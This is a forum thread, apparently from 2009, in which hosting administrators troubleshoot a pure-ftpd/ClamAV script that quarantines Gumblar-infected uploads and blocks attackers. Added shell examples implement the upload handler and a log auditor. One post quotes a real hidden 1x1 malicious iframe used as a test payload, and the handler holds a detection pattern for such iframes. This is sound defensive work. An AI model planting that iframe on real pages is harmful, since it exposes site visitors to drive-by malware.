SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

hidonet (Well-Known Member, joined Apr 29, 2005, Istanbul / Turkey):
Quote:
Thank you vinsar, I forgot to chmod the php file, and now that I did it is working. But I still have a strange problem: on one server the script always finds the iframe script and blocks the attacker, but does not change the password for the infected user. On the other server the script does not always find the iframe script, but does block the IP and change the password. The first server is CentOS 4.7, the other one is 5.2; both are on the same WHM/cPanel version. Usually, on the server where the script does not always find the iframe script, after it finds an infected file I have to kill the pid of the ftp_clamscan.sh script and restart pure-ftpd, and then it finds the script again, but after the first find it does not find it anymore. Any idea why that is?

There is a problem on some servers. Pure-FTPd is not returning the username, and the blocking routine is not running because of that.

I tested this problem on vinsar's server and his server is not returning the username argument.

I'm updating the script... Coming very soon...
 

ThE EnD (Member, joined Aug 25, 2009):
Thanks for your reply. The result of the command was:
[email protected] [~]# ps aux | grep clam
root 3222 0.0 0.9 103128 74740 ? Ssl Aug15 1:41 /usr/sbin/clamd
root 20499 0.0 0.0 3916 676 pts/0 R+ 04:28 0:00 grep clam

and I am going to test uploading the page now.
 

ThE EnD (Member, joined Aug 25, 2009):
I have modified an html file and added this code to it:
<iframe src="http://neglite.com/?click=ADB9A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
and uploaded it to one of my server sites,

but no action,
no email,
not disconnected or blocked,
nothing happens.
 

mtindor (Well-Known Member, joined Sep 14, 2004, inside a catfish, cPanel Access Level: Root Administrator):
Quote (ThE EnD): I have modified an html file and added the code in it [...] and uploaded it to one of my server sites, but no action, no email, not disconnected or blocked, nothing happens.

Are you sure that the URL in that iframe is a known malicious URL that might somehow be in the database for ClamAV? Simply adding any old iframe isn't going to do anything. It's not supposed to catch _all_ iframes.

mike
 

isputra (Well-Known Member, joined May 3, 2003, Mbelitar):
Quote:
Use

chmod +x ftp_clamscan.sh
chmod +x ftp_clamscan.php

at the command line; also see if an error_log file is generated in the same folder. If error_log is there, check it out and see what message is in there.

Using the above commands it works like a charm.
 

webicom (Well-Known Member, PartnerNOC, joined Mar 30, 2004, Slovenia):
It seems, the_end, that your ftp_clamscan.sh script is not running. If it were running, on ps aux | grep clam you should get something like this:
[[email protected] log]# ps aux | grep clam
root 3355 0.0 0.0 6256 644 pts/2 S+ 09:14 0:00 grep clam
root 5326 1.5 1.8 109892 75196 ? Ssl 08:48 0:24 /usr/sbin/clamd
root 5869 0.0 0.0 8680 256 ? Ss 08:50 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh
[[email protected] log]#


This line is important and tells you that your script is running: root 5869 0.0 0.0 8680 256 ? Ss 08:50 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh
 

mtindor (Well-Known Member, joined Sep 14, 2004, inside a catfish, cPanel Access Level: Root Administrator):
Quote (ThE EnD): I am sure, as I have got those codes from already infected pages.

Again, just because you know it's from an infected page, does that necessarily mean that ClamAV will pick it up? It's not exactly the best antivirus on the market, and even the best antivirus can't pick up the latest threats.

Mike
 

hidonet (Well-Known Member, joined Apr 29, 2005, Istanbul / Turkey):
Important note !!

Do not restart the FTP server with WHM. Please restart it with the /etc/init.d/pure-ftpd restart command.

The upload script does not work when you restart FTPd with WHM.
 

hidonet (Well-Known Member, joined Apr 29, 2005, Istanbul / Turkey):
Script updated !!!

Release Changelog - 20090902
- ) ftp_clamscan.sh file REMOVED. We don't need the ftp_clamscan.sh file anymore.
- ) Username finding mechanism fixed
- ) Kill IDLE connection function renewed
- ) Config file separated
- ) Log file located at /var/log/ftp_clamscan.log ( or wherever you want )
- ) Quarantine directory located at /quarantine/clamav/ ( or wherever you want )
- ) Some minor bugs fixed


Look at : Anti-Gumblar Protection Documentation
 

smksa (Member, joined Aug 1, 2006):
Quote (hidonet): [the Release Changelog - 20090902 post above]

May I know whether you have implemented taking a backup of any overwritten file?
 

isputra (Well-Known Member, joined May 3, 2003, Mbelitar):
Quote (hidonet): [the Release Changelog - 20090902 post above]

There are some bugs:

1. The IP is not listed in csf.deny after the file is moved to the quarantine folder.
2. The user that did the attack is not kicked off from FTP access after being identified by ClamAV as the attacker, so the hacker can still upload other files.

Other than that this script is working and I like it.
 

webicom (Well-Known Member, PartnerNOC, joined Mar 30, 2004, Slovenia):
Hi,

So, if I understand right, on the current installation I delete ftp_clamscan.sh, and all I have to do is overwrite ftp_clamscan.php, upload ftp_clamscan_config.php and restart pure-ftpd?

If so, may I ask what is calling ftp_clamscan.php to make it work? Maybe my question is stupid, but I'm still learning.
 

isputra (Well-Known Member, joined May 3, 2003, Mbelitar):
Quote (webicom): [the question above about what calls ftp_clamscan.php]

You also have to edit /etc/init.d/pure-ftpd and change:
Code:
$DAEMONIZE /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh
to:

Code:
$DAEMONIZE /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.php
And then you will see that ftp_clamscan.php works by itself.
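What that init-script line sets up is the whole mechanism the thread relies on: pure-ftpd (started with -o / --uploadscript) writes the path of every completed upload to a named pipe, and pure-uploadscript -B -r reads it and runs the handler once per file with that path as $1, exporting UPLOAD_USER, UPLOAD_VUSER, UPLOAD_UID, UPLOAD_GID and UPLOAD_SIZE to it. The handler below is an added example, not the thread's ftp_clamscan.php or ftp_clamscan.sh; it shows the same scan / quarantine / block sequence with the checks a practitioner wants at each step: an empty username is reported rather than guessed (the "not returning username" failure hidonet describes), and a csf -d that fails is logged as a failure instead of as "IP Blocked". The log and quarantine paths follow the changelog above; the PATTERNS list, the DRY_RUN switch and the ATTACKER_IP variable are this example's own assumptions (pure-uploadscript does not pass the client address, so the thread's script has to recover it from the pure-ftpd session), and locking the account with passwd -l stands in for the password change the thread's script performs.

```sh
#!/bin/sh
# Added example (not the thread's ftp_clamscan script): an upload handler for
# pure-uploadscript. pure-uploadscript runs the handler once per finished
# upload with the file path as $1 and exports UPLOAD_USER, UPLOAD_VUSER,
# UPLOAD_UID, UPLOAD_GID and UPLOAD_SIZE. Defaults below follow the thread's
# changelog; PATTERNS, DRY_RUN and ATTACKER_IP are this example's assumptions.

QUARANTINE="${QUARANTINE:-/quarantine/clamav}"
LOGFILE="${LOGFILE:-/var/log/ftp_clamscan.log}"
DRY_RUN="${DRY_RUN:-0}"   # 1 = log the actions but do not touch accounts or CSF

# Constructed "word scan" list: a hidden 1x1 iframe (the payload tested in the
# thread) and the ".ru:8080/" string seen in isputra's log.
PATTERNS='<iframe[^>]*(width=1|height=1|visibility: ?hidden)|\.ru:8080/'

log() { printf '%s --- %s\n' "$(date '+%Y.%m.%d %H:%M:%S')" "$*" >> "$LOGFILE"; }

# av_scan FILE: 0 if clamscan is installed and flags the file, 1 otherwise
# (clamscan exits 0 clean, 1 infected, 2 on error).
av_scan() {
    command -v clamscan >/dev/null 2>&1 || return 1
    clamscan --no-summary --infected "$1" >/dev/null 2>&1
    [ $? -eq 1 ]
}

# word_scan FILE: prints "match at line N" and returns 0 on the first hit,
# returns 1 when the file is clean.
word_scan() {
    hit=$(grep -m1 -niE "$PATTERNS" "$1" 2>/dev/null) || return 1
    printf 'match at line %s\n' "${hit%%:*}"
}

# ftp_user: the account pure-uploadscript reported. UPLOAD_VUSER is set for
# virtual users, UPLOAD_USER for system users. An empty result is the
# "not returning username" failure from the thread: report it, never guess.
ftp_user() {
    u="${UPLOAD_VUSER:-${UPLOAD_USER:-}}"
    [ -n "$u" ] || return 1
    printf '%s\n' "$u"
}

# quarantine FILE: move the file out of the docroot with a timestamp suffix
# and print the new path.
quarantine() {
    dest="$QUARANTINE/$(basename "$1").$(date +%Y%m%d%H%M%S)"
    mkdir -p "$QUARANTINE" && mv -- "$1" "$dest" && printf '%s\n' "$dest"
}

# handle_upload FILE: entry point. Returns 0 for a clean file, 2 when the
# file was quarantined.
handle_upload() {
    f="$1"; reason=""
    log "init... File : $f"
    if av_scan "$f"; then
        reason="clamav signature"
    elif reason=$(word_scan "$f"); then
        :
    else
        log "clean... $f"
        return 0
    fi
    log "$f| $reason |"
    log "File moved to : $(quarantine "$f")"
    if user=$(ftp_user); then
        # The thread's script sets a new password; locking the account stops
        # the stolen credential just the same and is reversible.
        log "lock account : $user"
        [ "$DRY_RUN" = 1 ] || passwd -l "$user" >/dev/null 2>&1
    else
        log "WARNING: no username from pure-uploadscript, account not locked"
    fi
    # pure-uploadscript does not pass the client address; the thread's script
    # looks it up from the pure-ftpd session. Here it is taken from ATTACKER_IP.
    if [ -n "${ATTACKER_IP:-}" ]; then
        if [ "$DRY_RUN" = 1 ]; then
            log "would run: csf -d $ATTACKER_IP ftp_clamscan"
        elif out=$(csf -d "$ATTACKER_IP" "ftp_clamscan: $reason" 2>&1); then
            log "IP Blocked : $ATTACKER_IP"
        else
            # csf refuses addresses listed in csf.allow; do not claim a block
            # that did not happen.
            log "IP NOT blocked : $out"
        fi
    fi
    return 2
}

# When run by pure-uploadscript: handle the uploaded file in $1.
if [ -n "${1:-}" ] && [ -f "$1" ]; then
    handle_upload "$1"
fi
```

After a pure-ftpd restart, ps aux | grep pure-uploadscript (as webicom shows above) is the quick check that the reader process is alive; without it the pipe fills up and nothing is scanned. Run the handler with DRY_RUN=1 against a test upload first and read the log before letting it lock accounts or call csf.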
 

webicom (Well-Known Member, PartnerNOC, joined Mar 30, 2004, Slovenia):
Yes of course, thanks Isputra. Maybe one question for all users: do you also experience from time to time that FTP uploads for customers get very slow? I do, but better that than viruses :)
 

isputra (Well-Known Member, joined May 3, 2003, Mbelitar):
Quote (webicom): Do you also experience from time to time that FTP uploads for customers get very slow?

Yes, a delay of about 5-10 seconds per file before it finishes.
 

hidonet (Well-Known Member, joined Apr 29, 2005, Istanbul / Turkey):
Quote (isputra): [the two bugs reported above: IP not listed in csf.deny, attacking user not kicked off FTP]

I did a lot of tests. This is an example log:

2009.09.02 06:12:18 --- init... File : /home/cube/test.html
2009.09.02 06:12:18 --- antivirus scan...
2009.09.02 06:12:19 --- word scan...
2009.09.02 06:12:19 --- /home/cube/test.html| Trojan.Iframe-9 |
2009.09.02 06:12:20 --- kill idle connection...
2009.09.02 06:12:20 --- kill -s 9 23714
2009.09.02 06:12:20 --- Killed process(es) : 23714
2009.09.02 06:12:20 --- block attacker ip...
2009.09.02 06:12:20 --- deny failed: 88.*.*.24 is in the allow file /etc/csf/csf.allow
2009.09.02 06:12:20 --- IP Blocked : 88.*.*.24
2009.09.02 06:12:20 --- send mail...
2009.09.02 06:12:20 --- end...

Do you see "deny failed"? The system is running correctly, but CSF is returning this error because I've added my IP to the allow list.

If your problem continues, please PM me.
 

isputra (Well-Known Member, joined May 3, 2003, Mbelitar):
And this is what I have in my log:

2009.09.02 14:21:09 --- ANTI GUMBLAR ( FTP CLAMSCAN ) LOG START
2009.09.02 14:21:09 --- init... File : /home/test/public_html/if-rame.html
2009.09.02 14:21:09 --- antivirus scan...
2009.09.02 14:21:09 --- word scan...
2009.09.02 14:21:09 --- wordscan results : .ru:8080/ at line 1 FOUND and file moved to File moved to : /quarantine/clamav//if-rame.html.20090902142109
2009.09.02 14:21:09 --- /home/test/public_html/if-rame.html|.ru:8080/ at line 1|
2009.09.02 14:21:09 --- pass change for user :
2009.09.02 14:21:11 --- kill idle connection...
2009.09.02 14:21:11 --- IDLE Process not found...
2009.09.02 14:21:11 --- block attacker ip...
2009.09.02 14:21:11 --- send mail...
2009.09.02 14:21:11 --- end...

As you can see, the log is not the same as yours. Some log lines are missing:
--- kill -s 9 XXXXX
--- Killed process(es) : XXXXX
--- IP Blocked : xx.xx.xx.xx

I am using the latest script.
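The comparison isputra makes by eye, which follow-up lines are missing between "init..." and "end...", is worth automating, because a detection with no kill and no block is exactly the window in which the attacker keeps uploading. The script below is an added example and not part of the thread's tool: it walks an ftp_clamscan-style log record by record, treats a line of the form "PATH| reason |" as a detection, and reports which of the kill, IP block and password change steps never happened. It also flags a "deny failed:" line from CSF, since hidonet's log shows the script printing "IP Blocked" right after CSF refused the deny, so the success line alone cannot be trusted. The two sample logs are the ones posted above (IP masked as posted); the "complete" record in the test is constructed.

```sh
#!/bin/sh
# Added example (not part of the thread's script): audit an ftp_clamscan-style
# log for detections whose follow-up actions never happened. One record runs
# from an "init..." line to the next "end..." line; a detection is the line of
# the form "PATH| reason |". The sample logs are copied from the thread.

# audit_log FILE: prints one line per detection, "PATH: complete" or the
# list of missing or failed actions.
audit_log() {
    awk '
    /--- init\.\.\. File : /  { file = $NF; det = 0; killed = 0; blocked = 0; denyfail = 0; user = ""; next }
    /\|.*\|/                  { det = 1 }
    /Killed process\(es\)/    { killed = 1 }
    /deny failed:/            { denyfail = 1 }
    /IP Blocked :/            { blocked = 1 }
    /pass change for user :/  { sub(/.*pass change for user :[ ]*/, ""); user = $0 }
    /--- end\.\.\./ && det    {
        miss = ""
        if (!killed)    miss = miss " no-kill"
        if (!blocked)   miss = miss " no-ipblock"
        if (denyfail)   miss = miss " csf-deny-failed"   # "IP Blocked" was logged anyway
        if (user == "") miss = miss " no-passchange"
        printf "%s:%s\n", file, (miss == "" ? " complete" : miss)
    }' "$1"
}

# write_samples DIR: the two logs posted in the thread, for a stand-alone run.
write_samples() {
    cat > "$1/hidonet.log" <<'EOF'
2009.09.02 06:12:18 --- init... File : /home/cube/test.html
2009.09.02 06:12:18 --- antivirus scan...
2009.09.02 06:12:19 --- word scan...
2009.09.02 06:12:19 --- /home/cube/test.html| Trojan.Iframe-9 |
2009.09.02 06:12:20 --- kill idle connection...
2009.09.02 06:12:20 --- kill -s 9 23714
2009.09.02 06:12:20 --- Killed process(es) : 23714
2009.09.02 06:12:20 --- block attacker ip...
2009.09.02 06:12:20 --- deny failed: 88.*.*.24 is in the allow file /etc/csf/csf.allow
2009.09.02 06:12:20 --- IP Blocked : 88.*.*.24
2009.09.02 06:12:20 --- send mail...
2009.09.02 06:12:20 --- end...
EOF
    cat > "$1/isputra.log" <<'EOF'
2009.09.02 14:21:09 --- ANTI GUMBLAR ( FTP CLAMSCAN ) LOG START
2009.09.02 14:21:09 --- init... File : /home/test/public_html/if-rame.html
2009.09.02 14:21:09 --- antivirus scan...
2009.09.02 14:21:09 --- word scan...
2009.09.02 14:21:09 --- wordscan results : .ru:8080/ at line 1 FOUND and file moved to File moved to : /quarantine/clamav//if-rame.html.20090902142109
2009.09.02 14:21:09 --- /home/test/public_html/if-rame.html|.ru:8080/ at line 1|
2009.09.02 14:21:09 --- pass change for user :
2009.09.02 14:21:11 --- kill idle connection...
2009.09.02 14:21:11 --- IDLE Process not found...
2009.09.02 14:21:11 --- block attacker ip...
2009.09.02 14:21:11 --- send mail...
2009.09.02 14:21:11 --- end...
EOF
}

# Usage: sh audit.sh /var/log/ftp_clamscan.log
if [ -n "${1:-}" ]; then
    audit_log "$1"
fi
```

Run against the two logs above it prints "/home/cube/test.html: csf-deny-failed no-passchange" and "/home/test/public_html/if-rame.html: no-kill no-ipblock no-passchange", which is the difference isputra lists plus the CSF refusal hidonet explains. A cron job that runs this over the day's log and mails anything other than "complete" turns the thread's manual log reading into a check.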